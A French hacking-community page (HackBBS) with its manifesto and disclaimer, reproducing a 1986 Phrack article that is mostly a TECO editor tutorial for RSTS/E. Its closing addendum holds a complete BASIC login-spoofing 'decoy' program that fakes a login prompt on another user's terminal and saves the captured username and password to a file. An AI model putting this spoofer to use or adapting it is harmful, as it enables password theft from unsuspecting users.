Plateforme de Hacking

HackBBS.org est une communauté faisant évoluer un système de services vulnérables.

Nous apprenons à exploiter de manière collaborative des solutions permettant de détourner les systèmes d'informations.
Cet apprentissage nous permet d'améliorer les technologies que nous utilisons et/ou de mieux comprendre l'ingénierie social.

Nous défendons les valeurs de l'entraide, du challenge personnel et contribuons modestement à rendre l'expérience des utilisateurs finaux la plus agréable possible.

Vous pouvez nous rencontrer via notre salon irc.
Le forum est en cours de remplacement par une version plus moderne, et tout aussi faillible que l'ancien ^^.
A ce jours nous enregistrons plusieurs dizaines de hack réussi contre notre site, et ce chiffre est en constante évolution. Merci a tous les contributeurs!

La refonte est en version alpha. Cette nouvelle plateforme permet de pentester à distance sans avoir son matériel à disposition.
Via l'exécution de scripts python connecté en websocket à l'ihm web, nous pouvons piloter le chargement de scénario
d'attaque/défense en "multijoueur" ^^.
Le système permet de charger des scripts de bibliothèques partagées et de chiffrer les échanges selon les modules déployés.
Vous trouverez dans la rubrique article de nombreux tutoriels afin de mieux comprendre la sécurité informatique,
ainsi que différents articles plus poussés.
Hacker
  • Sniffing
  • Cracking
  • Buffer overflow
  • Créations d'exploits
  • Social engineering
  • L'anonymat sur le web, spoofing
  • Bypass-proxy, Bypass-firewall
  • Injection de code SSI, SQL, etc...
  • Utilisation d'exploits, création de scripts(php, irc, perl)
Nous vous recommandons de sniffer votre réseau lors de votre navigation sur le site. La refonte vous fournira un outillage pour réaliser vos attaques/défenses.
Flux RSS

flux RSS d'HackBBS Abonnez-vous. Soyez prévenu des tournois, challenges, actualités, ...
Recevez nos dernières actualités sur notre flux RSS.



Challenges
Vous pourrez également participer à de nombreux challenges en constant renouvellement (si possible :p)
Dernièrement, les missions relativent aux derniers produits open sources marchent bien :)

Votre ultime challenge sera de défacer HackBBS. De nombreuses failles sont présentes. A vous de les trouver et de les exploiter.

Cet ultime test permettra de constater votre réactions face à une faille.
Black ou White? ^^

Ezine du moment: p09-04.txt
                               ==Phrack Inc.==

                    Volume One, Issue Nine, Phile #4 of 10

  $$$$$$$$$$$$$$$$$$$$$$$$
  $  PROGRAMMING RSTS/E  $
  $    File2: Editors    $
  $ by:                  $
  $      Solid State     $
  $$$$$$$$$$$$$$$$$$$$$$$$

  Written (c) Oct 11, 1986
  ------------------------

   Within this article I will be focusing on the TECO text editor found on
almost every installation of RSTS that you will pass by today. I feel it is
unneeded to do a write up on the other editors such as EDT, a screen editor
for VT100 and VT52 terminals, and EDFOR, a FORTRAN text editor, as most
hackers will not have the proper hardware/software at their disposal.
   This file does not contain many tricks, but has straightforward information
that most assuredly can be found in the user manual. Since not everyone has
access to help documents though, this file will provide a base for the first
time editor user and hopefully a reference for the experienced. If you feel
otherwise.. don't waste your time reading it.
   Following the main portion of the file is an updated copy of the decoy
trick I promised to revise that was featured in my first file. Hopefully, (I
am not promising though), I have succeeded in removing all the bugs this time.

USES
====

   A text editor, for those of you that happen to be brain dead, is a utility
similar to the word processor you use everyday on your micro: it allows a
person to create, modify, and compile text files. But, also can edit, and if
need be, create program files. For these reasons and many others, knowing how
to use an editor thoroughly can be a major advantage to the hacker on future
explorations.

EXECUTING
=========

   Typing TECO invokes the TECO text editor. If TECO is just typed without any
modifiers, then the file edited last will be placed in the editing buffer.
(More on this subject can be found below under MEMORY.) To edit a different
file, or create a new file, the following forms are used:

TECO filename.ext                  To edit an existing file.
TECO outfile.ext=infile.ext        To edit from one file to another.
MAKE filename.ext                  To create a new file.

   Other ways to execute TECO involve VT terminals, but we are not going into
that much detail within this text.

INITIALIZATION
==============

   If there is a file named TECO.INI in your directory when TECO is invoked,
it is assumed to be the macro settings for a VT terminal. We don't need to
bother with those, so make sure to disable the search by appending the switch
/NOINI on execution.

MEMORY
======

   Each time TECO is executed, the name of the file being edited is placed
into another file titled TECFnn.TMP where nn is your job number. If you invoke
TECO and wish to edit a file different than the one currently in the memory
file, select the switch /NOMEMORY.

MODIFIERS
=========

   There are a number of options, called switches, which modify the execution
of the TECO utility. Some like /NOINI and /NOMEMORY I have previously
mentioned. Other important switches follow along with a short description of
each. To select one of these options, append it to the call string when you
invoke TECO:

TECO filename.ext /[option1] /[option2] ...

/FIND                              This places the pointer at
                                    the last marked position
                                    within the input file.
/INSPECT                           If selected, you can only
                                    read the file, not edit.

   There are a few more that deal with the VT terminals, but as I've said
already, there is really no need to list them.

INTERRUPT
=========

   The control character 'C' (CTRL/C or ^C -which it shall from now on be
referred to as.) is used to halt the execution of the current TECO command,
the same as it does in the BASIC monitor. If ^C is typed twice without a TECO
command in between, the utility is aborted. (You are returned to the keyboard
monitor whichever it was.. eg. BASIC, BASIC+2, RSX..)

COMMAND EXECUTION
=================

   When TECO is called, you will receive the  *  prompt. This is the command
prompt. Almost all commands used by the editor are one or two characters in
length and are typed in using a normal ASCII keyboard. To terminate a TECO
command the  sequence is used. When typed, it will echo back as a  $
character. Two consecutive s must be entered before a command will be
carried out. This allows you to string together a line of commands like:

* [command1]$[command2]$[command3]$ ... $$

COMMANDS
========

 ]Moving the Pointer[

   The text pointer is used to represent where you are working, ie. if you
were to enter a command, what part of the text it would affect. It's similar
to the job your cursor does when writing a program on your micro.

'J'

   The "J" command is used to move the text pointer to the beginning or end of
the editing buffer.

   BJ     Move to the beginning of the buffer.
   ZJ     Move to end of the editing buffer.

'L'

   The "L" command moves the text pointer from one line to another. Common
forms of the command are:

   L      Move to beginning of the next line.
   0L     Move to front of current line.
   3L     Move to the third line down from the current line.
  -1L     Move back to previous line. (One above current.)
...

'C'

   The "C" command is used to move the text pointer past a specified number of
characters, forward or backwards, on the current line. Common forms include:

   C      Advance the pointer to the next character.
   5C     Move the pointer forward five characters.
  -5C     Move back five characters.
...

 ]Listing Text[

   There is one command with a couple various forms to list the text within
the editor; they follow.

'T'

   The "T" is used to list text from the editing buffer. Commonly found forms
are:

   HT     Print the entire contents of the editing buffer.
   T      Type text from the pointer to the end of the current line.
   0T     Type text from the beginning of the line to the text pointer.
   5T     Print the next five lines of text from the buffer, starting where
           the pointer is located.
...

 ]Entering Text[

   What use is an editor if you can't add to the text? There is one command,
insert, which allows you to write. If you are creating a file from scratch,
you would enter the insert command each time you wanted to add a new line to
your document.

'I'

   The "I" command is used to insert text into the buffer. After issued, the
text entered will be placed where the text pointer is located. The command is
of the form:

   I  

For example, to insert the sentence, "This is an example.", type:

   IThis is an example$

(Note: Remember that  echoes back to your screen as $)

 ]Deleting Text[

   The TECO text editor makes it easy to delete words, sentences, etc. from
the buffer. There are two different commands used, line delete, and letter
delete.

'K'

   The "K" issued when you choose to delete lines of text from the editing
buffer. Common forms are as follows:

   K      Delete the text from the pointer through the end of the current
           line.
   0K     Delete the text from the beginning of the line to through the
           pointer.
   5K     Omit the following five lines from the buffer.
   HK     Kill the entire contents of the buffer.
...

'D'

   The "D" appropriately is used to delete individual characters. A few of the
forms found are:

   D      Delete the character which follows directly after the text pointer.
   5D     Delete the following five characters from the text, starting from
           the pointer.
  -1D     Delete the character directly behind the pointer.
...

 ]Searching[

   All good word processors include a routine to search and replace a string
of text. So does the TECO text editor. Two forms are used, the locate text,
and the search and replace text commands.

'S'

   The "S" is used to locate a specified string of text currently in the
editing buffer. If the text is found, the pointer is positioned directly after
the specified text. If the string is not found, an error message results and
the text pointer is placed at the beginning of the buffer.

   S  

For example, to locate "This is an example.", enter:

   SThis is an example.$

'FS'

   "FS" for find and replace does exactly that. It searches for a specified
string of text, and if found replaces it with another sting of text. If the
specified text is not found though, the pointer is positioned at the beginning
of the buffer just like the "S" command. The "FS" command is of the form:

   FS    

For an example, to replace "hullo" with "hello!", use the command:

   FShullo$hello!$

 ]Saving[

   To save the new version of the file which you have been editing, you enter
the exit command and it shall be saved in your directory. Remember though, if
you wish to quit but not replace a file with your edited version, just type ^C
twice.

'EX'

   The "EX" command is used to write the current buffer to the output file,
then exit from TECO. For example:

   EX$$

(Note: Remember that  is echoed as $, and typing  twice causes
a command to be executed.)

FLAGS
=====

   The TECO text editor is not limited to the commands already shown. The
editor has a few flags which can be entered at the  *  prompt that will modify
the TECO environment.
   To examine the value of a flag type:

   [flag]x

Where [flag] is the specified flag and x is a numeric argument which returns
text. To set the value of a flag enter:

   x[flag]

Where x is the number or command being specified for the flag [flag].

'EH'

   EH is the error handling flag. Here's the table of arguments and their
meanings:

Value     Meaning

    1     If an error is encountered within the operation of TECO, only the
           3-character error code is printed.
    2     If an error is encountered during operation, a short message
           explaining the error is printed. (default setting)
    3     If an error is encountered, the command(s) which led to the error
           are printed.

'ET'

   ET, or Edit Terminal, is the command for modifying terminal output. Table
of arguments follows:

Value     Meaning

    1     Output is in image mode.
    2     Terminal in use is a scope.
    4     Terminal in use has lowercase available.
    8     ^T is read without echo.
   16     Cancels ^O during output.
  128     TECO aborts if an error is encountered.
  256     Output to screen is truncated to the terminal's width.
  512     VT terminal support available.
 1024     (same as above)
32768     Traps ^C

'^X'

   ^X, the last flag I'll mention, deals with searches. (Look above for the
command to search.)

Value     Meaning

    0     Either case matches during searches.
    1     An exact case match is required to complete a search.


CONCLUSION
==========

   That just about wraps up the TECO text editor.. boring eh? But as I've said
time and again, editors are important to hackers.

 Till next time...

   Solid State
>>>PhoneLine Phantoms!

_______________________________________________________________
File1- Addendum:

   Here's the updated version of the decoy program (yeah, the one that had an
error!) that was featured in File1. The concept of this revision is slightly
different, but it 'should' work more efficiently and easily than the first.
   To execute the program, first do a SYstat and record the KB numbers of
potential targets. Run the program, and enter the number of the KB only..
(Don't hang up!) ..then just wait till the program has ended and then check
the output file.

Note: This listing will not without modification work on all systems or under
      all conditions.


1 ! R S T S decoy
10 EXTEND
100 ON ERROR GOTO 1000
120 PRINT CHR$(140):PRINT:PRINT
130 INPUT "To which keyboard (KB)";K$
140 K$=CVT$$(K$,4%)
200 OPEN "KB:"+K$ AS FILE #1%
220 INPUT LINE #1%,A$
230 IF CVT$$(A$,4%)="" THEN 220
240 PRINT #1%
240 PRINT #1%,"RSTS"
250 PRINT #1%
260 PRINT #1%,"User: ";
270 INPUT LINE #1%,U$:U$=CVT$$(U$,4%)
280 T$=SYS(CHR$(3%))
290 PRINT #1%,"Password: ";
300 INPUT LINE #1%,P$:P$=CVT$$(P$,4%)
310 Z$=SYS(CHR$(2%))
320 PRINT #1%
330 PRINT #1%,"Invalid entry - try again":PRINT #1%
340 CLOSE #1%
400 OPEN "DATA.TXT" FOR OUTPUT AS FILE #2%
410 PRINT #2%,U$;";";P$
420 CLOSE #2%
999 END
1000 PRINT "?ERROR line #";ERL:STOP





Manifest
Le but de ce site est de mieux comprendre la sécurité informatique.
Un hacker par définition est une personne qui cherche à améliorer les systèmes d'information dans le seul et unique but de contribuer à la stabilité de ces systèmes!
La croyance populaire laisse entendre que les hackers sont des pirates.
C'est vrai. Mais il y a différents types de pirate.
Tout comme il y a différents types de personnes.
Les bavures courantes auxquelles on pense lorsqu'on évoque le terme de pirate informatique
seraient les hacks de compte msn, ordinateurs lâchement trojantés avec des exploits déjà tous faits
et encore peut-on classifier en tant que hack le fait de spammer
alors que depuis plus de 15 ans des scripts tous faits le font extrêmement bien?

Ce ne sont pas des hackers qui font ça!!!
Nous appelons ces gens des lammers! Quand ils sont mauvais,
ou des black hat lorsqu'ils sont doués dans la mise en application de leurs méfaits.
Aucun amour propre - Aucune dignité
Agissent par dégout, vengeance ou simple plaisir.
Les raisons peuvent être nombreuses et je ne prétends pas devoir juger qui que ce soit.
Je pense juste que l'on ne doit pas utiliser l'épée de fly pour commettre des injustices.
Il est 100 fois plus profitable d'améliorer un système que de marcher sur un château de sable... même si marcher sur un château de sable est rigolo :P
A vous de trouver votre amusement. ;)

Tu peux réagir sur la shootbox


Disclaimer Veuillez lire obligatoirement les règles ci-dessous avant de consulter ce site.
Conformément aux dispositions des différentes lois en vigueur, intrusions et maintenances frauduleuses sur un site, vol et / ou falsification de données.
Vous ne devez en aucun cas mettre en application les stratagèmes mis en place par ce site, qui sont présentés uniquement à titre d’éducation et de recherche dans le domaine de la protection de données.
Vous ne devez en aucun cas utiliser ce que vous aurez découvert, sauf si vous avez une autorisation écrite de l’administrateur d’un site ou que celui-ci vous ai ouvert un compte uniquement pour la recherche de failles.
Tout cela est interdit et illégal ne faites pas n'importe quoi.
Vous acceptez donc que l'administrateur de ce site n'est en aucun cas responsable d'aucun de vos actes. Sinon quittez ce site.
Vous êtes soumis à ce disclaimer.
ET À CE TITRE, NI LA COMMUNAUTÉ, NI L'ADMINISTRATEUR, NI L'HÉBERGEUR, NE POURRONT, NI NE SERONT RESPONSABLE DE VOS ACTES.